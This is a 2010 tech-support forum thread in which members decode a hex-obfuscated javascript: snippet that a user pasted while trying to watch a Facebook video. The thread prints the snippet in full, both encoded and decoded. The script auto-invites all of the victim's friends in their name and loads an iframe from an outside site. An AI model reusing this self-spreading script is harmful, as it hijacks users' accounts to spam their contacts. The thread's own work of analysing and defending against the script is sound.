Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Help needed from a java expert...


  • Please log in to reply
5 replies to this topic

#1 shaamoney

shaamoney

  • Members
  • 49 posts
  • OFFLINE
  •  
  • Local time:07:23 AM

Posted 19 April 2010 - 04:49 PM

A buddy of mine tried to watch a video through Facebook and he loaded the following code - does anyone have any idea what it does?

java script:var _0x1af0=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x61\x70\x70\x31\x30\x36\x34\x35\x36\x32\x32\x32\x37\x32\x38\x36\x31\x37\x5F\x62\x6F\x64\x79","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x61\x20\x69\x64\x3D\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3D\x22\x23\x22\x20\x61\x6A\x61\x78\x69\x66\x79\x3D\x22\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\x3F\x63\x6C\x61\x73\x73\x3D\x46\x61\x6E\x4D\x61\x6E\x61\x67\x65\x72\x26\x61\x6D\x70\x3B\x6E\x6F\x64\x65\x5F\x69\x64\x3D\x31\x31\x34\x31\x33\x38\x37\x35\x35\x32\x37\x37\x31\x36\x39\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x20\x70\x72\x6F\x66\x69\x6C\x65\x5F\x61\x63\x74\x69\x6F\x6E\x20\x61\x63\x74\x69\x6F\x6E\x73\x70\x72\x6F\x5F\x61\x22\x20\x72\x65\x6C\x3D\x22\x64\x69\x61\x6C\x6F\x67\x2D\x70\x6F\x73\x74\x22\x3E\x53\x75\x67\x67\x65\x73\x74\x20\x74\x6F\x20\x46\x72\x69\x65\x6E\x64\x73\x3C\x2F\x61\x3E","\x73\x75\x67\x67\x65\x73\x74","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x62\x72\x6F\x75\x67\x68\x74\x74\x6F\x79\x6F\x75\x2E\x6E\x65\x74\x2F\x70\x72\x61\x6E\x6B\x63\x61\x6C\x6C\x32\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x77\x69\x64\x74\x68\x3A\x20\x38\x30\x30\x70\x78\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x20\x36\x30\x30\x70\x78\x3B\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x30\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\x6E\x6F\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E"];var variables=[_0x1af0[0],_0x1af0[1],_0x1af0[2],_0x1af0[3],_0x1af0[4],_0x1af0[5],_0x
1af0[6],_0x1af0[7],_0x1af0[8],_0x1af0[9],_0x1af0[10],_0x1af0[11],_0x1af0[12],_0x
1af0[13]]; void (document[variables[2]](variables[1])[variables[0]]=variables[3]);var ss=document[variables[2]](variables[4]);var c=document[variables[6]](variables[5]);c[variables[8]](variables[7],true,true); void ss[variables[9]]; void setTimeout(function (){fs[variables[10]]();} ,4000); void setTimeout(function (){SocialGraphManager[variables[13]](variables[11],variables[12]);} ,5000); void (document[variables[2]](variables[1])[variables[0]]=_0x1af0[14]);

Thanks!

(Admin - please feel free to delete my other post in "general" - thanks)

BC AdBot (Login to Remove)

 


#2 groovicus

groovicus

  • Security Colleague
  • 9,963 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Centerville, SD
  • Local time:01:23 AM

Posted 19 April 2010 - 05:30 PM

Just as a point of clarification, that is Javascript, not Java. They are two completely unrelated languages.

At any rate, it is hexadecimal encoded javascript. the translated code looks something is (partially):
innerHTMLapp106456222728617_bodygetElementById<a id="suggest" href="#" ajaxify="/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=114138755277169" class=" profile_action actionspro_a" rel="dialog-post">Suggest to Friends</a>suggestMouseEventscreateEventclickinitEventdispatchEventselect_allsgm_invite_form/ajax/social_graph/invite_dialog.phpsubmitDialog<iframe src="http://broughttoyou.net/prankcall2" style="width: 800px; height: 600px;" frameborder=0 scrolling="no"></iframe>� 0@

I don't see much to be worried about, other than it was encoded in the first place.

#3 Andrew

Andrew

    Bleepin' Night Watchman


  • Moderator
  • 8,259 posts
  • OFFLINE
  •  
  • Gender:Not Telling
  • Location:Right behind you
  • Local time:12:23 AM

Posted 21 April 2010 - 06:50 PM

That code translates to this (with some cleanup by me):

void (document.getElementById(app106456222728617_body)innerHTML="<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=114138755277169\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>");

var ss=document.getElementById(suggest);
var c=document.createEvent(MouseEvents);
c.initEvent(click,true,true);

void ss.dispatchEvent;
void setTimeout(function (){fs.select_all();} ,4000); 
void setTimeout(function (){SocialGraphManager[submitDialog](sgm_invite_form,"/ajax/social_graph/invite_dialog.php");} ,5000); 
void (document.getElementByID(app106456222728617_body).innerHTML="<iframe src=\"http://broughttoyou.net/prankcall2\" style=\"width: 800px; height: 600px;\" frameborder=0 scrolling=\"no\"></iframe>";

I'm not a Javascript expert, nor a Facebook exploit expert, but that looks very much like it's trying to invite everyone on your friends list (posing as you) to use a particular app.

Edited by Andrew, 21 April 2010 - 06:56 PM.


#4 Romeo29

Romeo29

    Learning To Bleep


  • Members
  • 3,194 posts
  • OFFLINE
  •  
  • Gender:Not Telling
  • Location:127.0.0.1
  • Local time:02:23 AM

Posted 22 April 2010 - 04:20 AM

My 2 cents :

This is typically a malware dropper Javascript behavior :

1. hex encrypted Javscript in social networking site like Facebook
2. Auto sending invote to all your contacts
3. embedding an XSS Iframe

If you use NoScript add-on in Firefox, it should have warned you about XSS.

#5 shaamoney

shaamoney
  • Topic Starter

  • Members
  • 49 posts
  • OFFLINE
  •  
  • Local time:07:23 AM

Posted 23 April 2010 - 06:36 PM

Thanks for the reply guys, much appreciated.

Is there anything I need to do to counter it? Or is it likely to little/no effect?

It was for a video clip of a radio show in the US. It was one of those "lets see how many members we can get" groups.

Thanks in advance.

#6 Andrew

Andrew

    Bleepin' Night Watchman


  • Moderator
  • 8,259 posts
  • OFFLINE
  •  
  • Gender:Not Telling
  • Location:Right behind you
  • Local time:12:23 AM

Posted 24 April 2010 - 01:49 AM

The NoScript addon for Firefox would likely protect against this, as it detects and blocks 99% of XSS exploits.

Other browsers for which there is no NoScript or equivalent would not be protected unless Javascript was turned off altogether.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users